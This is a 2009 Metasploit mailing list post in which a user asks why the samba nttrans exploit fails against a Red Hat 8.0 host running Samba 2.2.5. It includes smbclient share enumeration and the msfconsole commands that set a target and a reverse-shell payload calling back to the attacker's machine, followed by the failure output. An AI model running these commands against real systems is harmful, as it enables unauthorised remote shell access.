Metasploit mailing list archives

exploit nttrans failed

From: lkiiski at niksula.hut.fi (Lauri Kiiski)
Date: Thu, 19 Mar 2009 12:58:47 +0200

Hi

I'm trying to use multi/samba/nttrans but the exploit isn't
successful. The target is Red Hat Linux 8.0 Kernel 2.4.18-14. The Samba
server is in it's default configuration. Is there something I could do
to succeed?

Target Samba information

$ smbclient -L //target.ip -N
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.5]

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       IPC Service (Samba Server)
        ADMIN$          IPC       IPC Service (Samba Server)
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.5]

        Server               Comment
        ---------            -------
        VMREDHAT             Samba Server

        Workgroup            Master
        ---------            -------
        MYGROUP              VMREDHAT

Commands and output of msf

use multi/samba/nttrans
set RHOST target.ip
set SMBName VMREDHAT
set SMBDomain MYGROUP
set PAYLOAD generic/shell_reverse_tcp
set LHOST msf.ip
set TARGET 0

msf exploit(nttrans) > exploit

[*] Started reverse handler
[-] Exploit failed: The server responded with unexpected packet
(Command=160 WordCount=0)
[*] Exploit completed, but no session was created.
msf exploit(nttrans) >